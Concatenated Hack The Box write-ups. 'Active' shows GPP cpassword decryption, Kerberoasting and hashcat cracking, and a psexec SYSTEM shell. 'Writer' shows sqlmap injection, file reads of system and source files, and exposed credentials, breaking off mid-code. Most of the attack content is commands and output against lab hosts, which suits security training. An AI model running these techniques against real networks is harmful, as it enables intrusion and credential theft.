# Active URL: https://app.hackthebox.com/machines/Active Level: Easy Date 3 Aug 2020 ## Walkthrough - [Enumeration](#enumeration) - [Kerberoasting](#kerberoasting) - [Admnistrator shell](#shell) # Enumeration ## NMAP Let's start with a basic nmap scan: ``` root@kali:/opt/htb/Active# nmap -T5 10.10.10.100 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-03 12:31 CEST Nmap scan report for 10.10.10.100 Host is up (0.053s latency). Not shown: 983 closed ports PORT STATE SERVICE 53/tcp open domain 88/tcp open kerberos-sec 135/tcp open msrpc 139/tcp open netbios-ssn 389/tcp open ldap 445/tcp open microsoft-ds 464/tcp open kpasswd5 593/tcp open http-rpc-epmap 636/tcp open ldapssl 3268/tcp open globalcatLDAP 3269/tcp open globalcatLDAPssl 49152/tcp open unknown 49153/tcp open unknown 49154/tcp open unknown 49155/tcp open unknown 49157/tcp open unknown 49158/tcp open unknown Nmap done: 1 IP address (1 host up) scanned in 13.29 seconds ``` We explore a little bit samba service: ``` root@kali:/opt/htb/Active# smbclient -L \\\\10.10.10.100\\ Enter WORKGROUP\root's password: Anonymous login successful Sharename Type Comment --------- ---- ------- ADMIN$ Disk Remote Admin C$ Disk Default share IPC$ IPC Remote IPC NETLOGON Disk Logon server share Replication Disk SYSVOL Disk Logon server share Users Disk Reconnecting with SMB1 for workgroup listing. do_connect: Connection to 10.10.10.100 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) Unable to connect with SMB1 -- no workgroup available ``` We connect to `Replication` share and we grab everything: ``` root@kali:/opt/htb/Active# smbclient \\\\10.10.10.100\\Replication Enter WORKGROUP\root's password: Anonymous login successful Try "help" to get a list of possible commands. smb: \> prompt off smb: \> recurse on smb: \> ls . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 active.htb D 0 Sat Jul 21 12:37:44 2018 \active.htb . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 DfsrPrivate DHS 0 Sat Jul 21 12:37:44 2018 Policies D 0 Sat Jul 21 12:37:44 2018 scripts D 0 Wed Jul 18 20:48:57 2018 \active.htb\DfsrPrivate . DHS 0 Sat Jul 21 12:37:44 2018 .. DHS 0 Sat Jul 21 12:37:44 2018 ConflictAndDeleted D 0 Wed Jul 18 20:51:30 2018 Deleted D 0 Wed Jul 18 20:51:30 2018 Installing D 0 Wed Jul 18 20:51:30 2018 \active.htb\Policies . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 {31B2F340-016D-11D2-945F-00C04FB984F9} D 0 Sat Jul 21 12:37:44 2018 {6AC1786C-016F-11D2-945F-00C04fB984F9} D 0 Sat Jul 21 12:37:44 2018 \active.htb\scripts . D 0 Wed Jul 18 20:48:57 2018 .. D 0 Wed Jul 18 20:48:57 2018 \active.htb\DfsrPrivate\ConflictAndDeleted . D 0 Wed Jul 18 20:51:30 2018 .. D 0 Wed Jul 18 20:51:30 2018 \active.htb\DfsrPrivate\Deleted . D 0 Wed Jul 18 20:51:30 2018 .. D 0 Wed Jul 18 20:51:30 2018 \active.htb\DfsrPrivate\Installing . D 0 Wed Jul 18 20:51:30 2018 .. D 0 Wed Jul 18 20:51:30 2018 \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9} . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 GPT.INI A 23 Wed Jul 18 22:46:06 2018 Group Policy D 0 Sat Jul 21 12:37:44 2018 MACHINE D 0 Sat Jul 21 12:37:44 2018 USER D 0 Wed Jul 18 20:49:12 2018 \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9} . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 GPT.INI A 22 Wed Jul 18 20:49:12 2018 MACHINE D 0 Sat Jul 21 12:37:44 2018 USER D 0 Wed Jul 18 20:49:12 2018 \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 GPE.INI A 119 Wed Jul 18 22:46:06 2018 \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 Microsoft D 0 Sat Jul 21 12:37:44 2018 Preferences D 0 Sat Jul 21 12:37:44 2018 Registry.pol A 2788 Wed Jul 18 20:53:45 2018 \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\USER . D 0 Wed Jul 18 20:49:12 2018 .. D 0 Wed Jul 18 20:49:12 2018 \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 Microsoft D 0 Sat Jul 21 12:37:44 2018 \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\USER . D 0 Wed Jul 18 20:49:12 2018 .. D 0 Wed Jul 18 20:49:12 2018 \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 Windows NT D 0 Sat Jul 21 12:37:44 2018 \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 Groups D 0 Sat Jul 21 12:37:44 2018 \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 Windows NT D 0 Sat Jul 21 12:37:44 2018 \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 SecEdit D 0 Sat Jul 21 12:37:44 2018 \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 Groups.xml A 533 Wed Jul 18 22:46:06 2018 \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 SecEdit D 0 Sat Jul 21 12:37:44 2018 \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 GptTmpl.inf A 1098 Wed Jul 18 20:49:12 2018 \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit . D 0 Sat Jul 21 12:37:44 2018 .. D 0 Sat Jul 21 12:37:44 2018 GptTmpl.inf A 3722 Wed Jul 18 20:49:12 2018 10459647 blocks of size 4096. 4878620 blocks available smb: \> mget * getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec) getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.4 KiloBytes/sec) (average 0.3 K iloBytes/sec) getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf ( 4.2 KiloBytes/sec) (average 1.5 KiloBytes/sec) getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.7 KiloBytes /sec) (average 1.6 KiloBytes/sec) getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (13.2 KiloBytes/sec) (averag e 3.4 KiloBytes/sec) getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 2.9 KiloBytes/sec) getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf ( 20.7 KiloBytes/sec) (average 4.6 KiloBytes/sec) smb: \> exit ``` We focus on Group Policy Preferences (GPP) file: ``` root@kali:/opt/htb/Active# find . -name Groups.xml ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml ``` rif. https://www.rapid7.com/blog/post/2016/07/27/pentesting-in-the-real-world-group-policy-pwnage/ https://www.mindpointgroup.com/blog/privilege-escalation-via-group-policy-preferences-gpp and we found a password: ``` root@kali:/opt/htb/Active# cat ./active.htb/Policies/{31B2F340-016D-11D2-945F-00C04FB984F9}/MACHINE/Preferences/Groups/Groups.xml <?xml version="1.0" encoding="utf-8"?> <Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}"><User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2" changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}"><Properties action="U" newName="" fullName="" description="" cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ" changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/></User> </Groups> ``` We decrypt cpassword: ``` root@kali:/opt/htb/Active# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ /usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated GPPstillStandingStrong2k18 ``` So far, we found: ``` user: active.htb\svc_tgs pass: GPPstillStandingStrong2k18 ``` ## Kerberoasting Then we use `GetUserSPNs.py` (from Impacket suite) to get ticket: ``` root@kali:/opt/htb/Active# GetUserSPNs.py active.htb/svc_tgs:GPPstillStandingStrong2k18 -dc-ip 10.10.10.100 -request Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation -------------------- ------------- -------------------------------------------------------- -------------------------- -------------------------- ---------- active/CIFS:445 Administrator CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb 2018-07-18 21:06:40.351723 2018-07-30 19:17:40.656520 $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$72f0f8cad9ad2149d2578dce023e391b$a0aedf26021b918e34c1b99430032008b280be672c4e7161a63f7245aa0124deed41b2f2f1db25fccec566d15a3d8e8c943ed66468f75e92bed78b3674283470e3152d0ec7d70ce1b553dc1bb94b518ed117b352f4cb46410d5329ee6cb017c88e9dcfb8691fc77eb853688ca37c31485c1ce012c467a0f47d9b0a5f4ff241d48b21f9bb3e934de5a537c311bc60b3c4c404c910597981f413cc547e122ec75ecf82b423499687ed23dce4b9a5eccd684b54ab578b5f8b473bdb6ed3fa9b7e7ca385624a49767f6511d3dd527eef191cca4936c673580fed15c51b4f1b8760d880428da3759bd17b2be27257657e1e7ae2a34a30bd9764e3405eed98a51d245b1d4305e7880c527e87f4122c79e459c8b3d4853591b897f6bdac9b26918f1978ca79ebefd7c2252ef34203c64a26d89eea8091c8e565b08c82569c4e0cf455c7ed3c8fef0d84829abcc5e6dd9e72b837f629fba2fa150cd4f7b24ec0f87d7db5a170d732ec3f2aabeceb3cf204a879094885647e04057d06ced16dd9d49797acabfbf7ade0e11514dccbcdcd2dd40fd810a522972babf46ef6b8445c25a3a4ce41f572442bea4000ce4fbdc5bd3e8597868fb9cc2ed0b0e64dff1ec0d3a75765f1002b6433559553db89ed3cc5e2fc7ba26602e2e83ff4e8adfb3c76df6ab4c3086c3490628eb70ac87aa89f6d3d836dedab1bfcc07bd029e40952b0c2eb60dfbc318603199223b46bffb8927e2ecfb050466402ef8d27624d05d14f843d9181b47c21bbfc96b9653725a1f2f2c78e7ec7f5c9903e225637a512b22de7d47f8fd5e8a20ea62f5574f5f911f9c495ddc4df41fe8c1dcdaac54c8010c8e84cbe1d1f88ed60ef5db691bf5f3e778ae92c575e0726b1a549bf32875965321b5e96ec5475e0914af8c6ed039e1818332927a51d9be4cc30c1b322787b6c7d87a85e594d3abc3e8025b1f7e6890ebf7e3fa6a040eabe1a5dabe43990d2b5b34898ebec23de8fa88a852b283ccea20a09fc9a897602287dd39555d8e70f06b57e46a7233727eb24d8cb57711441aa550832a7ab9721fa4f844d3149749f55306abc0545d0b2f5f4a124f337be6dfd0db6f1a5647c116b25b9c6d8c4a48d92ac8568fafe4ab969e668973bab2ab0332655993b2d4c8bdc1e9986383e446322258a168799b8e81b1e61a7e8801748222d3ba6e725a358a39168d01d864d307caa4be9971db202644140f2d50db7d3f750e501ef5b55dd7da52fe4237f87eb ``` We try to decrypt with `hashcat` and `rockyou.txt` wordlist: ``` D:\download\tools\hashcat-3.10\hashcat-3.10>hashcat64.exe -m 13100 active.txt d:\tmrc\hacking\wordlist\rockyou.txt hashcat (v3.10) starting... OpenCL Platform #1: NVIDIA Corporation ====================================== - Device #1: GeForce GTX 750 Ti, 512/2048 MB allocatable, 5MCU - Device #1: WARNING! Kernel exec timeout is not disabled, it might cause you errors of code 702 See the wiki on how to disable it: https://hashcat.net/wiki/doku.php?id=timeout_patch Hashes: 1 hashes; 1 unique digests, 1 unique salts Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates Rules: 1 Applicable Optimizers: * Zero-Byte * Not-Iterated * Single-Hash * Single-Salt Watchdog: Temperature abort trigger set to 90c Watchdog: Temperature retain trigger set to 75c Cache-hit dictionary stats d:\tmrc\hacking\wordlist\rockyou.txt: 139921507 bytes, 14343297 words, 14343297 keyspace $krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$72f0f8cad9ad2149d2578dce023e391b$a0aedf26021b918e34c1b99430032008b280be672c4e7161a63f7245aa0124deed41b2f2f1db25fccec566d15a3d8e8c943ed66468f75e92bed78b3674283470e3152d0ec7d70ce1b553dc1bb94b518ed117b352f4cb46410d5329ee6cb017c88e9dcfb8691fc77eb853688ca37c31485c1ce012c467a0f47d9b0a5f4ff241d48b21f9bb3e934de5a537c311bc60b3c4c404c910597981f413cc547e122ec75ecf82b423499687ed23dce4b9a5eccd684b54ab578b5f8b473bdb6ed3fa9b7e7ca385624a49767f6511d3dd527eef191cca4936c673580fed15c51b4f1b8760d880428da3759bd17b2be27257657e1e7ae2a34a30bd9764e3405eed98a51d245b1d4305e7880c527e87f4122c79e459c8b3d4853591b897f6bdac9b26918f1978ca79ebefd7c2252ef34203c64a26d89eea8091c8e565b08c82569c4e0cf455c7ed3c8fef0d84829abcc5e6dd9e72b837f629fba2fa150cd4f7b24ec0f87d7db5a170d732ec3f2aabeceb3cf204a879094885647e04057d06ced16dd9d49797acabfbf7ade0e11514dccbcdcd2dd40fd810a522972babf46ef6b8445c25a3a4ce41f572442bea4000ce4fbdc5bd3e8597868fb9cc2ed0b0e64dff1ec0d3a75765f1002b6433559553db89ed3cc5e2fc7ba26602e2e83ff4e8adfb3c76df6ab4c3086c3490628eb70ac87aa89f6d3d836dedab1bfcc07bd029e40952b0c2eb60dfbc318603199223b46bffb8927e2ecfb050466402ef8d27624d05d14f843d9181b47c21bbfc96b9653725a1f2f2c78e7ec7f5c9903e225637a512b22de7d47f8fd5e8a20ea62f5574f5f911f9c495ddc4df41fe8c1dcdaac54c8010c8e84cbe1d1f88ed60ef5db691bf5f3e778ae92c575e0726b1a549bf32875965321b5e96ec5475e0914af8c6ed039e1818332927a51d9be4cc30c1b322787b6c7d87a85e594d3abc3e8025b1f7e6890ebf7e3fa6a040eabe1a5dabe43990d2b5b34898ebec23de8fa88a852b283ccea20a09fc9a897602287dd39555d8e70f06b57e46a7233727eb24d8cb57711441aa550832a7ab9721fa4f844d3149749f55306abc0545d0b2f5f4a124f337be6dfd0db6f1a5647c116b25b9c6d8c4a48d92ac8568fafe4ab969e668973bab2ab0332655993b2d4c8bdc1e9986383e446322258a168799b8e81b1e61a7e8801748222d3ba6e725a358a39168d01d864d307caa4be9971db202644140f2d50db7d3f750e501ef5b55dd7da52fe4237f87eb:Ticketmaster1968 Session.Name...: hashcat Status.........: Cracked Input.Mode.....: File (d:\tmrc\hacking\wordlist\rockyou.txt) Hash.Target....: $krb5tgs$23$*Administrator$ACTIVE.HTB$act... Hash.Type......: Kerberos 5 TGS-REP etype 23 Time.Started...: Mon Aug 03 12:46:20 2020 (1 sec) Speed.Dev.#1...: 10560.7 kH/s (12.21ms) Recovered......: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts Progress.......: 10814790/14343297 (75.40%) Rejected.......: 1350/10814790 (0.01%) Restore.Point..: 10487080/14343297 (73.11%) [s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => Started: Mon Aug 03 12:46:20 2020 Stopped: Mon Aug 03 12:46:26 2020 ``` So far, we found Administrator password: ``` Ticketmaster1968 ``` ## Shell Now we can access through `psexec`: ``` root@kali:/opt/htb/Active# psexec.py active.htb/administrator:[email protected] Impacket v0.9.22.dev1+20200428.191254.96c7a512 - Copyright 2020 SecureAuth Corporation [*] Requesting shares on 10.10.10.100..... [*] Found writable share ADMIN$ [*] Uploading file WcMpjKpG.exe [*] Opening SVCManager on 10.10.10.100..... [*] Creating service byMP on 10.10.10.100..... [*] Starting service byMP..... [!] Press help for extra shell commands Microsoft Windows [Version 6.1.7601] Copyright (c) 2009 Microsoft Corporation. All rights reserved. C:\Windows\system32>whoami nt authority\system C:\Windows\system32> ```
# RopMe: ret2libc **[SEE VIDEO WALKTHROUGH HERE](https://youtu.be/AaKLMc_J9z8)**
# Writer - HackTheBox - Writeup Linux, 30 Base Points, Medium ![info.JPG](images/info.JPG) ## Machine ![‏‏Writer.JPG](images/Writer.JPG) ## TL;DR To solve this machine, we begin by enumerating open services using ```namp``` – finding ports ```22```, ```80```,```139``` and ```445```. ***User 1***: Discovering admin login page, running SQLMap and discovering it is SQL Injectable, Found ```FILE``` privilege, By reading ```/etc/apache2/sites-enabled/000-default.conf``` which lead us to ```/var/www/writer.htb/writer.wsgi``` file with ```admin``` credentials, Using those credentials to login to SMB as ```kyle``` user (takes from ```/etc/passwd```), Replace ```manage.py``` file with python reverse shell to get a reverse shell as ```www-data```, Found a file ```/etc/mysql/my.cnf``` with DB credentials, Using those creds we found this is the credentials of ```kyle``` user to SSH. ***User 2***: Found group permission to ```/etc/postfix/disclaimer```, Using that we can add a disclaimer (which is bash script behind) to outgoing emails, Using that, we get a reverse shell by changing the disclaimer script with our reverse shell and we get the user ```john```. ***Root***: Found write permission to file ```/etc/apt/apt.conf.d```, Creating a ```Pre-Invoke``` script which is a persistence technique to run code whenever ```apt``` is ran, Using that we can get a reverse shell as ```root```. ![pwn.JPG](images/pwn.JPG) ## Writer Solution ### User 1 Let's start with ```nmap``` scanning: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ nmap -sC -sV -oA nmap/Writer 10.10.11.101 Starting Nmap 7.80 ( https://nmap.org ) at 2021-08-12 18:29 IDT Nmap scan report for 10.10.11.101 Host is up (0.10s latency). Not shown: 996 closed ports PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0) 80/tcp open http Apache httpd 2.4.41 ((Ubuntu)) |_http-server-header: Apache/2.4.41 (Ubuntu) |_http-title: Story Bank | Writer.HTB 139/tcp open netbios-ssn Samba smbd 4.6.2 445/tcp open netbios-ssn Samba smbd 4.6.2 Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: 4m32s |_nbstat: NetBIOS name: WRITER, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-08-12T15:34:54 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 30.76 seconds ``` Let's observe port 80: ![port80.JPG](images/port80.JPG) Using ```gobuster``` we found the following web page [http://writer.htb/administrative](http://writer.htb/administrative): ![administrative.JPG](images/administrative.JPG) By intercepting the login request using [BurpSuite](https://portswigger.net/burp) we get: ```HTTP POST /administrative HTTP/1.1 Host: writer.htb User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 26 Origin: http://writer.htb DNT: 1 Connection: close Referer: http://writer.htb/administrative Upgrade-Insecure-Requests: 1 uname=admin&password=admin ``` Let's try a SQL Injection attack using ```sqlmap``` ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ sqlmap -r login_request --dump -t 100 ... [20:08:04] [INFO] fetching tables for database: 'writer' [20:08:04] [INFO] fetching number of tables for database 'writer' [20:08:04] [INFO] retrieved: 3 [20:08:12] [INFO] retrieved: site [20:08:42] [INFO] retrieved: stories [20:09:30] [INFO] retrieved: users ... ``` Great, Let's try to dump ```users``` table: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ sqlmap -r req --dump -D writer -T users -t 100 ... +----+------------------+--------+----------------------------------+----------+--------------+ | id | email | status | password | username | date_created | +----+------------------+--------+----------------------------------+----------+--------------+ | 1 | [email protected] | Active | 118e48794631a9612484ca8b55f622d0 | admin | NULL | +----+------------------+--------+----------------------------------+----------+--------------+ ``` ```john``` failed to crack the hash. Let's try to check privileges using ```sqlmap```: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $sqlmap -r req --privileges ... [20:41:10] [INFO] fetching privileges for user 'admin' [20:41:10] [INFO] retrieved: FILE database management system users privileges: [*] %admin% [1]: privilege: FILE ``` As we can see, we have ```FILE``` privilege, meaning that we can read files from the target ([Reference](https://www.hackingarticles.in/file-system-access-on-webserver-using-sqlmap/)). Let's try to get ```/etc/passwd```: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ sqlmap -r req --file-read=/etc/passwd --batch -t 500 ... root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin bin:x:2:2:bin:/bin:/usr/sbin/nologin sys:x:3:3:sys:/dev:/usr/sbin/nologin sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/usr/sbin/nologin man:x:6:12:man:/var/cache/man:/usr/sbin/nologin lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin mail:x:8:8:mail:/var/mail:/usr/sbin/nologin news:x:9:9:news:/var/spool/news:/usr/sbin/nologin uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin proxy:x:13:13:proxy:/bin:/usr/sbin/nologin www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin backup:x:34:34:backup:/var/backups:/usr/sbin/nologin list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin systemd-network:x:100:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin systemd-timesync:x:102:104:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin messagebus:x:103:106::/nonexistent:/usr/sbin/nologin syslog:x:104:110::/home/syslog:/usr/sbin/nologin _apt:x:105:65534::/nonexistent:/usr/sbin/nologin tss:x:106:111:TPM software stack,,,:/var/lib/tpm:/bin/false uuidd:x:107:112::/run/uuidd:/usr/sbin/nologin tcpdump:x:108:113::/nonexistent:/usr/sbin/nologin landscape:x:109:115::/var/lib/landscape:/usr/sbin/nologin pollinate:x:110:1::/var/cache/pollinate:/bin/false usbmux:x:111:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin sshd:x:112:65534::/run/sshd:/usr/sbin/nologin systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin kyle:x:1000:1000:Kyle Travis:/home/kyle:/bin/bash lxd:x:998:100::/var/snap/lxd/common/lxd:/bin/false postfix:x:113:118::/var/spool/postfix:/usr/sbin/nologin filter:x:997:997:Postfix Filters:/var/spool/filter:/bin/sh john:x:1001:1001:,,,:/home/john:/bin/bash mysql:x:114:120:MySQL Server,,,:/nonexistent:/bin/false ``` We need to find what is the directory of the website, To do that, we can read the config file ```/etc/apache2/sites-enabled/000-default.conf```: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ sqlmap -r req --file-read=/etc/apache2/sites-enabled/000-default.conf --batch -t 500 ... ``` ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ cat 000-default.conf <VirtualHost *:80> ServerName writer.htb ServerAdmin [email protected] WSGIScriptAlias / /var/www/writer.htb/writer.wsgi <Directory /var/www/writer.htb> Order allow,deny Allow from all </Directory> Alias /static /var/www/writer.htb/writer/static <Directory /var/www/writer.htb/writer/static/> Order allow,deny Allow from all </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log LogLevel warn CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> # Virtual host configuration for dev.writer.htb subdomain # Will enable configuration after completing backend development # Listen 8080 #<VirtualHost 127.0.0.1:8080> # ServerName dev.writer.htb # ServerAdmin [email protected] # # Collect static for the writer2_project/writer_web/templates # Alias /static /var/www/writer2_project/static # <Directory /var/www/writer2_project/static> # Require all granted # </Directory> # # <Directory /var/www/writer2_project/writerv2> # <Files wsgi.py> # Require all granted # </Files> # </Directory> # # WSGIDaemonProcess writer2_project python-path=/var/www/writer2_project python-home=/var/www/writer2_project/writer2env # WSGIProcessGroup writer2_project # WSGIScriptAlias / /var/www/writer2_project/writerv2/wsgi.py # ErrorLog ${APACHE_LOG_DIR}/error.log # LogLevel warn # CustomLog ${APACHE_LOG_DIR}/access.log combined # #</VirtualHost> # vim: syntax=apache ts=4 sw=4 sts=4 sr noe ``` We can see the following file ```/var/www/writer.htb/writer.wsgi```, Let's get this file using ```sqlmap```: ```console ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ sqlmap -r req --file-read=/var/www/writer.htb/writer.wsgi --batch -t 500 ... !/usr/bin/python import sys import logging import random import os # Define logging logging.basicConfig(stream=sys.stderr) sys.path.insert(0,"/var/www/writer.htb/") # Import the __init__.py from the app folder from writer import app as application application.secret_key = os.environ.get("SECRET_KEY", "") ``` As we can see in the comments It's imported ```__init__.py``` from ```app```, According to the ```from``` we know the folder located on ```writer``` folder, Let's get this file also: ```python ┌─[evyatar@parrot]─[/hackthebox/Writer] └──╼ $ sqlmap -r req --file-read=/var/www/writer.htb/writer/__init__.py --batch -t 500 .. from flask import Flask, session, redirect, url_for, request, render_template from mysql.connector import errorcode import mysql.connector import urllib.request import os import PIL from PIL import Image, UnidentifiedImageError import hashlib app = Flask(__name__,static_url_path='',static_folder='static',template_folder='templates') #Define connection for database def connections(): try: connector = mysql.connector.connect(user='admin', password='ToughPasswordToCrack', host='127.0.0.1', database='writer') return connector except mysql.connector.Error as err: if err.errno == errorcode.ER_ACCESS_DENIED_ERROR: return ("Something is wrong with your db user name or password!") elif err.errno == errorcode.ER_BAD_DB_ERROR: return ("Database does not exist") else: return ("Another exception, returning!") else: print ('Connection to DB is ready!') #Define homepage @app.route('/') def home_page(): try: connector = connections() except mysql.connector.Error as err: return ("Database error") cursor = connector.cursor() sql_command = "SELECT * FROM stories;" cursor.execute(sql_command) results = cursor.fetchall() return render_template('blog/blog.html', results=results) #Define about page @app.route('/about') def about(): return render_template('blog/about.html') #Define contact page @app.route('/contact') def contact(): return render_template('blog/contact.html') #Define blog posts @app.route('/blog/post/<id>', methods=['GET']) def blog_post(id): try: connector = connections() except mysql.connector.Error as err: return ("Database error") cursor = connector.cursor() cursor.execute("SELECT * FROM stories WHERE id = %(id)s;", {'id': id}) results = cursor.fetchall() sql_command = "SELECT * FROM stories;" cursor.execute(sql_command) stories = cursor.fetchall() return render_template('blog/blog-single.html', results=results, stories=stories) #Define dashboard for authenticated users @app.route('/dashboard') def dashboard(): if not ('user' in session): return redirect('/') return render_template('dashboard.html') #Define stories page for dashboard and edit/delete pages @app.route('/dashboard/stories') def stories(): if not ('user' in session): return redirect('/') try: connector = connections() except mysql.connector.Error as err: return ("Database error") cursor = connector.cursor() sql_command = "Select * From stories;" cursor.execute(sql_command) results = cursor.fetchall() return render_template('stories.html', results=results) @app.route('/dashboard/stories/add', methods=['GET', 'POST']) def add_story(): if not ('user' in session): return redirect('/') try: connector = connections() except mysql.connector.Error as err: return ("Database error") if request.method == "POST": if request.files['image']: image = request.files['image'] if ".jpg" in image.filename: path = os.path.join('/var/www/writer.htb/writer/static/img/', image.filename) image.save(path) image = "/img/{}".format(image.filename) else: error = "File extensions must be in .jpg!" return render_template('add.html', error=error) if 